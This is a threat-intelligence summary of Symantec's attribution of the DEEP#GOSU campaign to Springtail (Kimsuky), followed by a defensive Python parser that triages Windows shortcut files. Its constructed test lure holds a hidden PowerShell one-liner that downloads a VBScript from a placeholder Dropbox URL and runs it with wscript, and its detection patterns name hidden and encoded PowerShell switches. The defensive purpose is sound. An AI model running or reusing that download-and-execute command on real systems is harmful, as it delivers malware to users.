New DEEP#GOSU campaign attributed to Springtail APT (aka Kimsuky)
2024-03-20 • Symantec
Symantec attributes the DEEP#GOSU campaign to Springtail, the group also tracked as Kimsuky or Thallium. The attack chain uses .LNK shortcut files, embedded PowerShell, and VBScript stagers to download payloads hosted on Dropbox. The final malware combines infostealer and backdoor functionality, including clipboard monitoring, keylogging, and data exfiltration. The report names Symantec's CL.Downloader!gen241 detection for the downloader and notes that the observed domains and IP addresses are covered through WebPulse security categories.
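The chain described above starts from a shortcut file, so a defender's first triage step is to read the .LNK itself rather than execute it. The following is an added example written for this page, not code from Symantec's report: a minimal Shell Link parser that walks the ShellLinkHeader and StringData fields (offsets and LinkFlags bits from the MS-SHLLINK specification) and flags the observables the report describes (PowerShell invocation, hidden or encoded switches, a VBScript stager, a Dropbox download). The sample shortcut bytes are constructed inline with a placeholder Dropbox URL; the triage labels and thresholds are this example's assumptions, not Symantec's detection logic.

```python
import re
import struct
from typing import Dict, List

# ShellLinkHeader.LinkFlags bits (MS-SHLLINK 2.1.1)
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
SW_SHOWNORMAL = 1
SW_SHOWMINNOACTIVE = 7  # lures often use this so the console never gets focus


def parse_lnk(data: bytes) -> Dict[str, object]:
    """Parse the header and StringData section of a .lnk file."""
    if len(data) < 76 or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link (.lnk) file")
    flags = struct.unpack_from("<I", data, 20)[0]
    show_command = struct.unpack_from("<I", data, 60)[0]
    pos = 76
    if flags & HAS_LINK_TARGET_ID_LIST:          # skip LinkTargetIDList: u16 size + IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                    # skip LinkInfo: u32 size includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    out: Dict[str, object] = {"link_flags": flags, "show_command": show_command}
    # StringData fields appear in this fixed order, each as u16 char count + chars
    for name, bit in (("name", HAS_NAME), ("relative_path", HAS_RELATIVE_PATH),
                      ("working_dir", HAS_WORKING_DIR), ("arguments", HAS_ARGUMENTS),
                      ("icon_location", HAS_ICON_LOCATION)):
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        if flags & IS_UNICODE:
            out[name] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:
            out[name] = data[pos:pos + count].decode("latin-1")
            pos += count
    return out


# Triage heuristics (assumptions of this example) matching the DEEP#GOSU chain
SUSPICIOUS = [
    ("PowerShell launched from shortcut", re.compile(r"powershell(\.exe)?|\bpwsh\b", re.I)),
    ("hidden/non-interactive PowerShell switches",
     re.compile(r"-(?:w(?:indowstyle)?\s+hidden|nop(?:rofile)?\b|e(?:nc(?:odedcommand)?)?\b|noni(?:nteractive)?\b)", re.I)),
    ("VBScript stager", re.compile(r"\.vbs\b|\bw?cscript\b|\bwscript\b", re.I)),
    ("payload fetched from Dropbox", re.compile(r"dropbox(?:usercontent)?\.com", re.I)),
]


def triage_lnk(data: bytes) -> List[str]:
    """Return the list of suspicious traits found in a .lnk file."""
    info = parse_lnk(data)
    text = " ".join(str(info.get(k, "")) for k in ("relative_path", "working_dir", "arguments", "icon_location"))
    findings = [label for label, rx in SUSPICIOUS if rx.search(text)]
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        findings.append("window minimised on launch (SW_SHOWMINNOACTIVE)")
    return findings


def build_lnk(relative_path: str, arguments: str, show_command: int) -> bytes:
    """Build a minimal, well-formed .lnk (constructed test data, not a real sample)."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)

    def sd(s: str) -> bytes:
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + sd(relative_path) + sd(arguments)


# Constructed lure modelled on the described chain; the Dropbox path is a placeholder.
SAMPLE_LURE = build_lnk(
    r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    r'-nop -w hidden -c "iwr https://dl.dropboxusercontent.com/s/PLACEHOLDER/stage.vbs '
    r'-OutFile $env:TEMP\s.vbs; wscript $env:TEMP\s.vbs"',
    SW_SHOWMINNOACTIVE,
)
SAMPLE_BENIGN = build_lnk(r"..\..\Program Files\Notepad++\notepad++.exe", "", SW_SHOWNORMAL)

if __name__ == "__main__":
    for label, blob in (("lure", SAMPLE_LURE), ("benign", SAMPLE_BENIGN)):
        print(label, "->", triage_lnk(blob) or "no findings")
```

The parser stops after StringData and ignores the optional ExtraData blocks that follow; for triage of a lure that is enough, because the command line a double-click executes lives in COMMAND_LINE_ARGUMENTS. Because the file is never executed, this can run on a mail gateway or in a sandbox pre-filter before the PowerShell stage ever reaches a host.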